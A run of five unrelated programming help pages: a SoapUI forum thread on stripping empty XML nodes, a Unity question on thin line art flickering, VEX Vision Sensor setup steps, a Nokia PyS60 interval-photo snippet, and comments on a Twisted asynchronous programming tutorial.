holder.updateProperty() context.requestContent = holder.xml I have implemented it under projects > events: "ProjectRunListener.beforeRun" and "RequestFilter.filterRequest". Sorry again for my little knowledge. Thank you guys Hi, Based on the few nodes you have in your request, I wouldn't use the script you have below, I'd create it on the fly. I'm assuming your test looks something like.... - Datasource Step - SOAP Request Step - Datasource Loop My two cents, clone the test you have so far to create a new one. That way, if my suggestion doesn't help, you've not lost anything. In the cloned copy of the test, insert a new Groovy step so test looks like... - Datasource Step - Groovy Script - SOAP Request Step - Datasource Loop Don't forget to update the Datasource Loop to go to the Groovy script instead of the SOAP Request. The idea here is that for each row in the datasource, we're going to build the body of the request in the Groovy Script. Then when SoapUI reaches the SOAP Request Step, it will 'pull' the body for this request from the Groovy step. Also, clear out that code to strip empty nodes from the SOAP Request step. In the SOAP Request Step, you'll have the whole body in the request pane, which as posted above contains... > Delete the nodes from this so it looks something like.... <v1:Request> <Document> ${Groovy Step#result} </Document> </v1:Request> The bit ${Groovy Step#result} calls the Groovy script and replaces ${Groovy Step#result} with the result from the script. Bit like a placeholder. Here's the grind.... Edit the Groovy Step and start adding checks for each node... // Initialise the variable we're going to add our nodes into. def returnString = ''; // Start with the first element FamilyName... // Get family name from the datasource... def familyName = context.expand( '${TestData_DataEntry#FamilyName}' ); if (familyName.length() > 0) { // There is a family name in this datasource row. Let's use it.
returnString = returnString + "<v13:FamilyName><v13:PrimaryValue>" + familyName + "</v13:PrimaryValue></v13:FamilyName>"; } // FirstName Element check... def firstName = context.expand( '${TestData_DataEntry#FirstName}' ); if (firstName.length() > 0) { returnString = returnString + "<v13:FirstName>" + "<v13:PrimaryValue>" + firstName + "</v13:PrimaryValue></v13:FirstName>"; } // And so on until you have checked each element... // Finally, return what we have put together... return returnString; Hopefully, that should then provide you with a request that is dynamic and doesn't contain any empty nodes. Dear @ChrisAdams Thank you very much for your reply and your help. Actually this was only a part of the nodes of my request. A full request is actually much longer, but I thought showing only part of the nodes would help to show my current "test setting" and issue. So in this case, if I build the whole body with a Groovy script, this would take too much time, because I have 200 different requests. Another idea I had was to have something that deletes all empty nodes when the data are loaded from the Excel file, before the request is sent. But I don't know if this is possible. Hi, Sorry, I thought that was pretty much the request. If you have so many nodes (200?), then building a script to check each node in the way I described would be too much work. I don't know how easy it would be to make a working script to remove the empty/redundant nodes. Maybe someone else can help with that. Chris If you're running ReadyAPI, you could create an event handler to strip out the empty elements after the data has been extracted from your source but before it's injected via your REST request, so you wouldn't have to build the XML using Groovy. For the event handler Groovy you'd just need to identify the XPath of the attributes you want stripped. Ta Rich Thank you for your answer. Could you explain a little more about your idea with the event handler? I am using ReadyAPI 3.3.1.
I did an event handler with the script mentioned in my previous messages in this topic. I used the "RequestFilter.filterRequest" event and it didn't work. What went wrong? This was the script:

def groovyUtils = new com.eviware.soapui.support.GroovyUtils( context )
def stepName = context.getCurrentStep().getLabel()
def holder = groovyUtils.getXmlHolder(stepName + "#Request")
for( item in holder.getDomNodes( "//*[. = '']" )){
    holder.removeDomNodes("//" + item.nodeName)
}
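For what it's worth, the underlying idea (strip every empty leaf element from the body before it is sent) can be sketched outside SoapUI entirely. The following is an illustrative plain-Python version using the standard library's ElementTree; the XML body and function name are made up for the example, and this is not ReadyAPI or SoapUI code:

```python
# Sketch only: strip empty leaf elements from an XML body before sending it.
# This mirrors what the Groovy event handler is meant to do, but in Python.
import xml.etree.ElementTree as ET

def strip_empty_elements(elem):
    # Recurse first, so elements emptied by child removal are caught too.
    for child in list(elem):
        strip_empty_elements(child)
        has_no_text = child.text is None or not child.text.strip()
        if has_no_text and len(child) == 0 and not child.attrib:
            elem.remove(child)
    return elem

body = "<Request><FamilyName>Smith</FamilyName><FirstName></FirstName></Request>"
root = strip_empty_elements(ET.fromstring(body))
cleaned = ET.tostring(root).decode()
# The empty <FirstName/> element has been removed from `cleaned`.
```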
https://community.smartbear.com/t5/SoapUI-Open-Source-Questions/Empty-Elements-in-XML-with-Data-from-Excel/td-p/211527/page/2
The game I'm working on uses an illustration art style with lots of thin, detailed lineart created in vector graphics tools. It looks fantastic on very high resolution displays, but at low resolutions, when the camera zooms out, the lines start flickering or disappearing when objects move around, which makes the game look ugly. How can I prevent this from happening? I've created a simple test scene with a circle containing very thin perpendicular lines to demonstrate the issue. This is the 256x256px texture I'm using as a test:

Texture import settings:
- Texture Type: Sprite (2D \ uGUI)
- Sprite Mode: Single
- Pixels To Units: 100
- Filter Mode: Bilinear
- Max Size: 1024
- Format: Truecolor

Here is a portion of a 1024x768px screen with two circles next to each other. The orthographic camera has a size of 30. This is what I would expect from point filtering on textures, but it is set to Bilinear. Is this a bug in Unity, or is there something happening that I don't understand?

After trying various strategies for eliminating the flickering and making the lines crisper, I found a script on the Oculus forums that implements supersampling by rendering the scene to a render texture twice the size of the screen and displaying that in a new camera that culls everything else. The result (above) is much better, but is still quite blurry because of the bilinear filtering on the render texture. Switching it to point filtering produces results identical to the original image. Why does supersampling help in this case (since the circle textures are set to Bilinear filtering already)? If supersampling is really the best way of tackling this problem, what is the best way to downsample the large render texture using a different algorithm (not bilinear filtering)?
The camera that renders the large render texture has the script:

using UnityEngine;
using System.Collections;

public class TextureRenderCamera : MonoBehaviour {

    public RenderTexture CameraRenderTexture;

    void OnRenderImage (RenderTexture source, RenderTexture destination) {
        // Just draw the texture
        Graphics.Blit (CameraRenderTexture, destination);
    }
}

Can I change Graphics.Blit (CameraRenderTexture, destination); to Graphics.Blit (CameraRenderTexture, destination, mat); where mat would have a custom fragment shader (possibly based on) applied to it? I've never dealt with shaders before, so I don't understand the pipeline yet.

Answer by Owen-Reynolds · Jun 20, 2014 at 01:43 PM

That's just the way graphics work. A 256x256 image will always look blurry when blown up, and high-contrast areas will always be choppy when shrunk. The standard solution is to limit the zoom. Another is to use multiple "LOD" images. Say those two lines are 5 pixels wide (including the "fade into blue" pixels). When it gets shrunk, they become less than a pixel wide, and parts of the line drop out. Rotating and moving recalculates the math, and single pixels drop in and out. One way or another, vector graphics, super-sampling ... all any solution can do is thicken that line as the image gets smaller (thicken in the full-sized image, or not shrink as much as it should in actual size. Depends how you want to think of it.) I feel like super-sampling isn't the solution at all, and just happens to always make the lines wider. I've never done this, but in theory you can hand-make the mip-maps and install them yourself. Not sure Unity allows that. So you can draw one that looks good at 32x32, 64x64 ... full screen (that would be the original.) And the graphics card will automatically pick the nearest size and perform blending. A hack version of that would be to simply switch out images based on zoom.
But that would snap (which might not look so bad.) Most of that's true, and I considered doing custom 2D LOD, possibly blending between atlases at runtime, and that sounds like a lot of extra work plus a ballooning of executable size. Supersampling is an improvement because it doesn't require more assets and looks better than nearest neighbor downsampling. All of the 2D art approaches I've seen (excluding pixel art) work from very large images that get downsampled by the engine. High contrast areas in images don't have to be choppy when shrunk down - what pixels are preserved and how depends on the scaling algorithm. shows an example of scaling down using bilinear interpolation - no choppiness in sight. The same is true for the game Rayman Legends, where the artists work from 4K atlases or greater, but Rayman appears a few cm tall in game and still looks great (including the eyes, which are very high contrast with fine black pupils). Rayman at the largest and smallest game resolution. Zoom in to see little Rayman's eyes. Why does Unity resort to nearest-neighbor downscaling for images marked as bilinear? Is there a way to change this behavior? AFAIK, Unity just uses the standard graphics card features. Bilinear filtering, for any size, unless you specify Point (which I think is also known as Nearest Neighbor.) Those top two circles do seem to have snapped to Point filtering, which has never happened for me. That paper seems like it's from the days when it was still practical to do graphics on the CPU. I misspoke about high-contrast. Thin high-contrast features give me the only trouble. Sharp lines are the absolute worst. Filtering on shrunk images just fades them out. I think an actual game artist might know more about known problem textures. I'd suspect Rayman's pupils may be drawn separately. But, as you note, a large sharp circle will generally shrink down just fine (until it becomes less than a pixel.)
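To see why the downsampling algorithm matters so much for thin features, here is a small illustrative sketch in plain Python (independent of Unity; the "image" is just a nested list of pixel values): nearest-neighbor sampling can drop a one-pixel-wide line entirely, while a 2x2 box filter averages it into the smaller image.

```python
# Sketch (not Unity code): compare nearest-neighbor and 2x2 box-filter
# downsampling of an image containing a one-pixel-wide dark line.

def make_image(size):
    # White background (255) with a single-pixel vertical black line (0).
    img = [[255] * size for _ in range(size)]
    for row in img:
        row[1] = 0  # thin line at column 1
    return img

def nearest_downsample(img):
    # Keep every other pixel; thin features can vanish entirely.
    return [row[::2] for row in img[::2]]

def box_downsample(img):
    # Average each 2x2 block; thin features fade, but stay visible.
    n = len(img) // 2
    return [[(img[2*y][2*x] + img[2*y][2*x+1] +
              img[2*y+1][2*x] + img[2*y+1][2*x+1]) // 4
             for x in range(n)] for y in range(n)]

img = make_image(8)
nn = nearest_downsample(img)   # the line at column 1 is skipped: all white
box = box_downsample(img)      # the line survives as gray (127) in column 0
```

This is the same reason the supersampled render texture looks better: the extra samples give the filter something to average, instead of the line falling between sample points.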
https://answers.unity.com/questions/731249/preserving-fine-line-art-variable-zoom-and-resolut.html?sort=oldest
Step 1: Open a Project

Step 2: Enable Expert Robot Configuration

Step 3: Accept Terms of Expert Robot Configuration

Step 4: Include New File
- Right click on the ‘include’ dropdown and select “New File.”

Step 5: Add Vision Sensor Configuration File
- Select the ‘Vision Sensor Configuration(.h)’ C++ file.
- Assign the Vision Sensor to a port.
- Name the file [name of file].h
- Click the Create button.

NOTE: The file name MUST contain the correct extension of “.h”; the file cannot be created without it.

Step 6: Launch the Vision Utility
- Click on the newly created Vision Sensor File to open the file.
- Click on the Configure button to launch the vision utility.

Step 7: Place an Object in View
- Place an object in front of the Vision Sensor so that it takes up most of the screen and click on the 'Freeze' button to lock the screen.

Step 8: Select the Object's Color
- Click and drag a bounding box on the color/object to be tracked. Make sure to have the bounding box contain mainly the color of the object and little to none of the background.

Step 9: Assign the Color
- Click on one of the seven 'Set' checkboxes to assign that color to a signature slot.

Step 10: Calibrate the Color Signature
- Click on the double-sided arrow icon to the right of the 'Clear' button and use the slider to calibrate the Vision Sensor to best detect the color signature. For best results, drag the slider until most of the colored object is highlighted while the background and other objects are not.

Step 11: Name the Signature
- Click on the SIG_1 text field in order to rename the color signature.
- Press the Freeze button once more to allow the Vision Sensor to resume tracking. Move the colored object within the field of view of the Vision Sensor to ensure that it is being tracked. If the tracking is working as intended, close out of the Vision Utility.
- The color signatures can also be changed in the text editor via the Vision Sensor Configuration file.
- To configure the Vision Sensor to detect more colors, repeat steps 5-9.

NOTE: The Vision Sensor is sensitive to different levels of light. The color signatures might need to be re-calibrated if the levels of light in the robot's environment change.

Step 12: Open main.cpp
- Click main.cpp to open the file.

Step 13: Modify main.cpp
- Type out #include "[name of Vision Sensor file].h".
https://kb.vex.com/hc/en-us/articles/360035954951-Vision-Sensor-Expert-Robot-Configuration-Robot-Config-VEXcode-Pro-V5
Archived: Take a photo at regular intervals. Here is code that will help take photos from a camera at regular intervals. The interval can be set as required by the developer.

import e32, camera

path = "c:\\tmp.jpg"

def capture():
    img = camera.take_photo()
    img.save(path)

d = 0
while True:
    print "Wait"
    e32.ao_sleep(3)
    capture()
    print "Photo %d saved\n" % (d)
    d += 1

print "Session Ended"

The loop in the code is a forever loop. This loop can be modified according to the condition required by the developer. The above code takes a new image from the camera at a regular interval of 3 seconds. This interval can be modified by changing the argument in the statement e32.ao_sleep(3), which introduces the delay. Note that with the above code the images are always saved under the same name, so each photo overwrites the previous one. Provision can also be made to save the images with different names. There are several naming formats; one is to include the date in the file name. The following code can be used for that:

from time import ctime

your_path = "C:\\image "

def capture():
    img = camera.take_photo()
    # this saves the picture in jpg format with a date in the filename
    img.save(your_path + ctime() + ".jpg")

Both codes can be combined appropriately to capture photos from the camera at regular intervals and save them to a desired location, each with a distinct file name.
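One caveat with the date-in-filename approach above: ctime() returns a string like 'Mon Feb 18 12:00:00 2013', which contains spaces and colons that are not valid in file names on many filesystems. A camera-independent sketch of a safer scheme using time.strftime (the prefix and format below are only examples, not part of the original article):

```python
# Sketch: build a filesystem-safe timestamped filename with time.strftime
# instead of ctime(), whose output contains spaces and colons.
import time

def timestamped_name(prefix="image_", ext=".jpg", seconds=None):
    # gmtime(None) means "now"; passing an epoch value makes this testable.
    stamp = time.strftime("%Y%m%d_%H%M%S", time.gmtime(seconds))
    return prefix + stamp + ext

name = timestamped_name(seconds=0)  # "image_19700101_000000.jpg"
```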
http://developer.nokia.com/community/wiki/Take_a_photo_at_regular_intervals
90 thoughts on “An Introduction to Asynchronous Programming and Twisted”

in the countdown app you are doing import the reactor twice. I don’t think that’s necessary, the code runs fine without the one in line 7.

Hey Luis, that’s a good point, there’s no actual need for the inline import. I’m going to go ahead and leave it, though. Since most reactor imports are done inline, it’s still a good example of typical usage, I think.

Hi, this is a very good introduction to Twisted + callbacks. I did your suggested exercises and learned more. Thanks.

You’re welcome.

Thanks for the intro. Maybe a dumb question here: after I install a reactor, will subsequent imports of reactor from twisted.internet still use my installed reactor?

They will, yes.

I was wondering about the same thing and doing line 6 confused me quite a bit. Doing further investigating reveals that it’s not needed. So I’d suggest removing that from the code altogether. It confused me, at least

Fair enough, I will take it out.

Me again. Any idea why this, when trying to run basic-twisted/simple-poll.py:

File "/System/Library/Frameworks/Python.framework/Versions/2.6/Extras/lib/python/twisted/internet/pollreactor.py", line 19, in
    from select import error as SelectError, poll

Been beating my head against it for quite a while now. Do pardon whatever obvious thing I’m undoubtedly missing (or operator error, more likely).

Hilarious: I can’t even report the problem correctly. Here’s what I was actually wondering about: “ImportError: cannot import name poll”. Where is ‘select’ supposed to be found? The error message seems to imply that ‘error’ itself has been imported correctly, but that ‘poll’ can’t be located, yes? Any insights greatly appreciated.

Hm, it may be that poll() is not available on Mac OS. I’ll check when I get home later. But it’s safe to skip over that one for now

Hey Mark, I’m pretty sure poll just isn’t available on Mac OS. I updated the text to indicate that possibility.

Hi Dave!
I’m trying to complete suggested exercise #2 (LoopingCall). It’s working OK, but did I understand correctly how I should implement it? Many thanks for any thoughts.

Looks like the right track to me! I think it can be simplified a bit, see my comment here:

Thanks for this wonderful tutorial, Dave! You’re a wonderful teacher. Just wanted to share my approach for the second question, since I’m quite proud of it Thanks again!

Thank you, and nice solution!

Hello Felipe, I didn’t succeed in running your solution without changing line 10 from

print "LoopCall # {} down to {}".format(index, counters[index])

to

print "LoopCall # {0} down to {1}".format(index, counters[index])

Copy/paste problem? Regards

Probably Python versions. If I recall correctly, in 2.6 and earlier, you have to explicitly specify your var indices. My guess is Felipe is using 2.7 or higher…

Hi, Dave! I’ve really been enjoying your tutorial – your teaching style is both clear *and* entertaining. Thanks for the time you put in! Here’s my exercise #2 solution: Win?

Glad you like the series! I think you’ve got yourself a solution there, nicely done. I do think it would be better to avoid sub-classing LoopingCall.

How would you do that? But that’s my favorite part!

Fair enough

Hey Dave, I’m quite new to Twisted programming, and I have a question regarding the NotRestartable thingy: what if the sockets and factories the SelectReactor shall deal with change during runtime? Say, an IP address changed, or – in my case – you have separate modules for each Protocol which are not known at the moment the reactor.run()s? As you cannot restart the reactor, I see the following options:

– Change to poll reactor to have one reactor for each Protocol: not possible in my case (Mac OSX)
– Change program architecture to start the reactor after sockets are known

Are there any further options? Cheers

THIMC, there’s a discussion on the mailing list about that:

Hey Fabian, I didn’t have time to respond to your post yesterday.
The short answer is that it’s definitely possible, just do those same calls to connect to a port while your program is running rather than on startup. But now that you have the question out on the Twisted mailing list, you should get some detailed answers.

The trick is to make an initial connection. I just did an initial reactor.run() and some time later made the first reactor.connectTCP() – it just got stuck then. It’ll work if you provide the reactor with a connectTCP() to some kind of Fake Protocol BEFORE calling reactor.run()

Interesting solution

You can always call reactor.connectTCP after the reactor starts and you don’t need to call it even once before it does so. However, you will need to arrange for some callback to be invoked when you are ready to make the connection. Consider the reactor.callLater() function, for example.

Here’s mine ;D

Looking good, but I think it stops as soon as any one of the counters finishes, instead of after the last one.

Here’s my solution for #1. I don’t really believe this is the best approach, but since the counters have to communicate somehow between each other in order to decide when to call reactor.stop(), the only solution I managed to come up with was global variables. I would greatly appreciate it if someone could give me a hint on how this could be solved in a better way. P.S.: I’m not a native speaker, so excuse me for any mistakes I could have made

Your solution certainly works! And your English is very good, don’t worry. To get rid of the global variable, you could pass a shared object to each of the counters and have them invoke a method on it when the counter is done. And then that separate object could be in charge of shutting down the reactor instead of the counters. You could even just pass a reference to the method itself, as a ‘callback’, which is kind of looking forward to the next parts.

Hi, Thank you for the awesome tutorial. Here is my solution for Exercise 2: Learned a lot by doing this!
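The shared-object suggestion above can be sketched without any Twisted code at all. In this purely illustrative version, a toy loop stands in for the reactor, each counter is handed the same monitor object, and the monitor decides when everything is finished (all names here are made up for the example):

```python
# Sketch of the 'shared object' idea: instead of a global, each counter
# notifies a shared monitor when it finishes, and the monitor alone decides
# when to shut things down. A toy loop stands in for the Twisted reactor.

class Monitor(object):
    def __init__(self, expected):
        self.remaining = expected
        self.stopped = False

    def counter_done(self):
        self.remaining -= 1
        if self.remaining == 0:
            self.stopped = True  # a real version would call reactor.stop()

class Countdown(object):
    def __init__(self, count, monitor):
        self.count = count
        self.monitor = monitor

    def tick(self):
        self.count -= 1
        if self.count == 0:
            self.monitor.counter_done()

monitor = Monitor(expected=2)
counters = [Countdown(2, monitor), Countdown(3, monitor)]

# Toy event loop: keep ticking until the monitor says we're done.
while not monitor.stopped:
    for c in counters:
        if c.count > 0:
            c.tick()
```

The point of the design is that no counter knows how many other counters exist; only the monitor tracks that.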
I recommend that everyone do the exercises. Nicely done, and you are welcome!

I did have one question. Out of curiosity, I commented out the line that stopped the looping call. The code still worked. I suspected this was a bad idea, but why?

It still printed out the right things because of that ‘if self.counter:’ guard in your count() method. Although the loops keep running after they reach zero, they don’t print anything out. And when you stop the reactor it doesn’t wait for LoopingCalls (which are implemented using reactor.callLater()). But it’s still much better to stop those loops when you don’t need them. They will take up some CPU because they keep looping, and if you accumulate a lot of them then that will add up.

Oh of course! Thank ye kindly

Very well explained. I am new to Python and having some problems with exercise 1: this is the link to my solution: it is giving some errors, please give it a look!! (I’m sure I’m not using select.select() correctly.) I was looking at the solution of Narada. It looks synchronous to me. I mean, where is the outer loop which takes care of which counter runs at which time (so that nothing is blocked)? I know these are silly things to ask and not worthy of your time, but I have tried to understand it myself with no success. Hoping your explanation will help me to understand later parts in a better way.

Hi Amit, in Part 3 you don’t need the outer loop because the Twisted reactor provides that loop for you — the loop starts when you call reactor.run() and that function doesn’t return until the loop finally stops. So there is no need for your own loop (and no need for a select() call since there are no sockets to listen on). Does that make sense? dave

Hi Dave! Thanks for the tutorial, I really like the way you explain. One question I have is, how does Twisted benefit from smaller tasks (callbacks)? Would it make any difference for one single request if I do, say, 100 smaller callbacks instead of 10 bigger ones?
In the end, it’s the same amount of work. And those callbacks, while doing their work, actually block the reactor for a small period of time, right?

Yes, you are right that it is about the same amount of work (the 100 requests do have the extra function call overhead). And while a callback (any callback) is running, the reactor cannot service any other requests. If your server only ever handles one request at a time, then it wouldn’t make any difference. Of course, if your server only handles one request at a time, then there’s no real reason to use the asynchronous model either.

Thanks for the tutorial! I’m enjoying it very much! Here’s mine. Does anybody have a solution without globals??? I can’t find it.

Yes….it has a very big problem with the names…;)

Glad you liked the tutorial. Could you pass the Control object to each instance of Countdown instead of using a global?

I love how you explicitly point out things like “when our callbacks are running, the Twisted loop is not running”! It really helps

Hi Dave, Thanks for the tutorial. I’m new to Python and async. I’m getting some errors in my attempt at exercise 1. My thoughts were to pass in a separate object that would store a dictionary of the different counters and their respective counts and would check for when the counters all were down to zero. However, I think that my class is running outside the reactor, as any debugging print statements happen before the reactor start message. I think that this is the root of my issues. My ‘complete’ method is tossing errors that I don’t understand. Any insight you could offer would be a great assistance! Thanks!

Hey Seth, welcome to Python! The reason why you have some code running before the reactor starts is because the calls to .count() in callWhenRunning are happening before you call callWhenRunning.
The argument to callWhenRunning should be a function reference (the function you want to call when the reactor is running), plus whatever arguments you want to pass to that function when it is actually called. So you need something like:

reactor.callWhenRunning(Countdown().count, groupCounter)

Does that make sense? Since you are new to Python, I have implemented a version of your idea in a bit more of a ‘Pythonic way’ here, if you’re interested, but feel free to figure it out on your own first if you like.

Dave, Excellent! That makes complete sense. By looking at the documentation, apparently, passing group_counter (lines 50-52 in your re-write of my code) is available in def count (line 28) by being the second parameter in callWhenRunning. Thanks a ton!

Thanks for the tutorial. I’ve done some async sockets in C, but was struggling to wrap my head around the programming model of Twisted. Here’s my code for exercise 2:

Nicely done!

Hi Dave, I’m having trouble with exercise #1. You did refer to it in another reply, but it doesn’t show up. Can you repeat it or provide a new link? Your tutorial is fantastic — very well written and even fun to read. Thanks, dave

I found the (a) solution:

#!/usr/bin/env python

class Countdown(object):

    number_running = 0

    def __init__(self, max):
        self.max_count = max
        self.counter = self.max_count
        Countdown.number_running += 1

    def count_down(self):
        if self.counter == 0:
            Countdown.number_running -= 1
            if Countdown.number_running == 0:
                reactor.stop()
        else:
            print self.counter, '...'
            self.counter -= 1
            reactor.callLater(1, self.count_down)

from twisted.internet import reactor

counter1 = Countdown(5)
counter2 = Countdown(10)
counter3 = Countdown(15)

reactor.callWhenRunning(counter1.count_down)
reactor.callWhenRunning(counter2.count_down)
reactor.callWhenRunning(counter3.count_down)

print 'Start!'
reactor.run()
print 'Stop!'

Nicely done! Glad you are liking the tutorial.
Hi Dave, I used your solution as a springboard to my own, but I think your solution only works if you have the same delay for each counter. The exercise asked us to have a variable delay, and if you follow your code it doesn’t work. What I did was to move the if block dealing with the reactor stop below the original “if else” block to deal with this. No doubt my code can be massively improved, but here’s my solution that allows for both variable delay and number of counts.

class Countdown(object):

    number_of_counters = 0

    def __init__(self, name="Countdown", delay=1, counter=5):
        self.delay = delay
        self.counter = counter
        self.name = name
        Countdown.number_of_counters += 1

    def count(self):
        if self.counter == 0:
            print 'A task (%s) has completed' % (self.name,)
            Countdown.number_of_counters -= 1
        else:
            print self.name, self.counter, '...'
            self.counter -= 1
            reactor.callLater(self.delay, self.count)
        if Countdown.number_of_counters == 0:
            print 'Stop the reactor'
            reactor.stop()

from twisted.internet import reactor

reactor.callWhenRunning(Countdown("Counter 1", 3, 3).count)
reactor.callWhenRunning(Countdown("Counter 2", 1, 3).count)
reactor.callWhenRunning(Countdown().count)

print 'Start!'
reactor.run()
print 'Stop!'

And the output is as follows:

Start!
Counter 1 3 ...
Counter 2 3 ...
Countdown 5 ...
Counter 2 2 ...
Countdown 4 ...
Counter 2 1 ...
Countdown 3 ...
Counter 1 2 ...
A task (Counter 2) has completed
Countdown 2 ...
Countdown 1 ...
A task (Countdown) has completed
Counter 1 1 ...
A task (Counter 1) has completed
Stop the reactor
Stop!

Hi Dave, I tried your code above and it didn’t work for me. I don’t know the exact reason, but what I am guessing is that you have created 3 different objects of the class Countdown, so all 3 objects are different and have no relation/way to communicate between them to see if all the counters have finished or not. Please correct me if I am wrong. PS: I am very new to Python, please pardon if something is wrong with my understanding.
Hi Bhaarat, I looked at the other Dave’s code (the one with a capital D is a different Dave than me) and it looks to me like it should eventually stop. The reason is that the number_running variable is a class-level variable (it is accessed via Countdown, not via self) and so it is shared between all instances of the class. Note it does not have a variable delay as Steve pointed out. I forgot I put that part into the exercise!

Hi dave, thanks for the reply and I get the point. Actually, I realized this concept soon after posting the doubt, but I thought to let it get confirmed by others too :). Anyways, the article is awesome.

Random question here on Python: in the following code, why is it reactor.callWhenRunning(stack) and NOT reactor.callWhenRunning(stack())… what is the difference in meaning between the two?

def stack():
    print 'The python stack:'
    traceback.print_stack()

from twisted.internet import reactor
reactor.callWhenRunning(stack)

Hey Daniel, it’s the difference between a function call and a function reference. Consider the following from the interactive interpreter:

>>> import time
>>> print time.time
<built-in function time>
>>> print time.time()
1349323851.11

The first print shows the time.time function and the second the result of calling that same function. Now the callWhenRunning method expects a function reference and it will arrange for the reactor to call that function (using the reference) when the reactor starts. If we say:

reactor.callWhenRunning(function_name)

Then we are passing a function reference the reactor can use to call the function later by using the () operator. But if we say:

reactor.callWhenRunning(function_name())

Then Python will first call function_name and then it will call callWhenRunning with the result of the first function call as the first argument. Whew! Does that make sense?

I believe that the “selectreactor” is no longer the default reactor. IIUC, “epollreactor” is now the default reactor (at least on Linux).
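The reference-versus-call distinction can also be demonstrated without Twisted. In this illustrative sketch, a tiny stand-in for the reactor stores function references now and calls them later; call_when_running and run are made-up names here, not Twisted APIs:

```python
# Sketch: a toy stand-in for the reactor that stores function references
# and only calls them when "the reactor starts". Passing stack (a
# reference) defers the call; passing stack() would call it immediately.

pending = []  # (function, args) pairs the toy "reactor" will call later

def call_when_running(func, *args):
    # Store the reference plus its arguments; nothing is called yet.
    pending.append((func, args))

def run():
    # The "reactor" starts: now every stored reference is actually called.
    return [func(*args) for func, args in pending]

def stack():
    return 'the python stack'

call_when_running(stack)  # a reference; stack() only runs inside run()
results = run()           # now stack is called, via the stored reference
```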
Good point, I have updated the text to make it more general.

Sorry… IIUC = “If I Understand Correctly”

Many thanks for this lovely series! I’m new to Twisted and was unfamiliar with asynchronous programming terminology, so this has been a great help. I’ve been imagining a “reactor” as the thing keeping the program moving forward, perhaps by spitting out callbacks something like how a nuclear reactor spits out neutrons. While I still like the image, I suspect your account makes more sense… Here are my solutions for the exercises: #1: #2: I actually came up with the two different approaches as solutions for #1, and then altered one of them to use LoopingCall. Is my sense that #2 (with or without LoopingCall) seems more “Twisted flavored” correct? And is the instinct (also in #2) to remove the call to reactor.stop from other callbacks a good one (even if unnecessary here)?

You are welcome! I quite like the imagery of a Twisted reactor firing out callbacks like a nuclear reactor firing off neutrons. And since the Twisted reactor really is driving the whole show, I think it definitely works well as a metaphor. Using LoopingCall would probably be what most Twisted developers would use because, well, it’s already there. Your instinct to move the reactor.stop call from the Countdown object is definitely a good one. Few objects will need to call reactor.stop and it doesn’t make much sense in the Countdown object. I like the second solution better because the Countdown objects are actually performing the counting themselves, whereas in the first solution they are really just data structures. In the second solution the counters have to know about the monitors and vice-versa. Is there a way you could make the Countdown objects agnostic towards them?

In writing the two solutions, I was thinking mostly of the difference between the first and second solutions as being how coordination was organized, i.e.
between having the callbacks go to the aggregate pool vs going to the individual countdown objects. While I did notice that by the time I was done the Countdowns in #1 were stripped down almost to being structs, I chalked that up to this being a toy example. Though of course facilities like LoopingCall are the reason for using Twisted in the first place, the point of my aside was that even without LoopingCall, the organization of #2 would still be more suggestive of Twisted thinking — which you appear to agree with. Indeed, your suggestion of what to do further here seems to continue the process of separating the components: not only does the monitor not get to control the countdowns, they don’t even need to send it status messages. So far, the only strategy I’ve come up with that actually leaves the Countdowns blissfully oblivious of what’s going on around them is to have the monitor object poll them to see if they’ve finished. Like this: #3 (The pasted version has (at least) two bugs, that don’t have any effect here: monitor.__init__ doesn’t set the rate attribute to the function argument, and monitor.poll fails to call self.looper.stop) Is that what you were getting at? It works, but I don’t have a very intuitive sense of whether it’s a good way to do this. Thanks for taking the time to look at my code. That’s definitely what I was getting at, but getting closer to the “Twisted” way of doing that would be to have the Countdown objects accept a generic callback parameter which is invoked when the count is done, i.e., don’t assume the thing on the other end is a countdown monitor with a ‘finalize’ method, just give whatever it might be a mechanism to find out when the count is finished. You could have countdown objects accept a ‘callback’ parameter that will be called with no arguments when the count is over. Then the monitor can pass something like lambda : self.finalize(ctdn) as the callback. Make sense? 
Eventually you will see that the fully “Twisted” way of doing this would be for the Countdown objects to provide a Deferred object, but that’s looking ahead.

It seems there was one point I misunderstood in writing #3. My design goal there was that the Countdown objects were inward turned — an object like the monitor could examine what they were doing, but beyond a start signal, they accepted no outside information after construction, and called no other objects. I suppose I can say that this was at least asynchronous, but I’m not sure it could be called an asynchronous network… So here we go, a version in which the Countdown objects are very bad airline passengers that accept callbacks in brown paper wrappers from random passersby: #4:

Also, now the monitor will track any object with a setCallback method. This feels a bit unspecific, since there are events other than completion of a process that should trigger callbacks. Maybe it should be something like callWhenFinished? One rather arbitrary design goal I have used in all the versions is to store the startTime in only one place. This means I’m always trying to solve the problem of where and how each endTime should be generated. I included a commented-out line that suggests how a timestamp could be passed back when the callback is triggered. Given that these callbacks are triggered by a process completing, it doesn’t seem entirely out of place to send a timestamp. Though, now I think of it, I suppose the endTime argument could be made optional with a default. Are these the kinds of issues solved by Deferred objects? I find it useful to work through things on a low level like this. Thanks again for your help and patience here.

Yes, that’s the sort of thing I had in mind. And callWhenFinished seems like a better name to me too. Deferreds solve the ‘managing callbacks’ problem so that each and every class like Countdown doesn’t have to manage its own set of callbacks.
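As a purely illustrative sketch of that 'managing callbacks' idea (this is a toy, not Twisted's actual Deferred, which also handles errors and callback chaining):

```python
# Toy sketch of a Deferred-like object: it holds the list of callbacks so
# classes like Countdown don't each have to manage their own. Callbacks
# added after the result has already arrived are run immediately.

class ToyDeferred(object):
    def __init__(self):
        self.callbacks = []
        self.called = False
        self.result = None

    def add_callback(self, func):
        if self.called:
            func(self.result)  # already fired: run right away
        else:
            self.callbacks.append(func)

    def fire(self, result):
        # The asynchronous operation finished; notify everyone in order.
        self.called = True
        self.result = result
        for func in self.callbacks:
            func(result)

d = ToyDeferred()
log = []
d.add_callback(lambda r: log.append('first saw %s' % r))
d.add_callback(lambda r: log.append('second saw %s' % r))
d.fire('done')  # both callbacks run, in the order they were added
```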
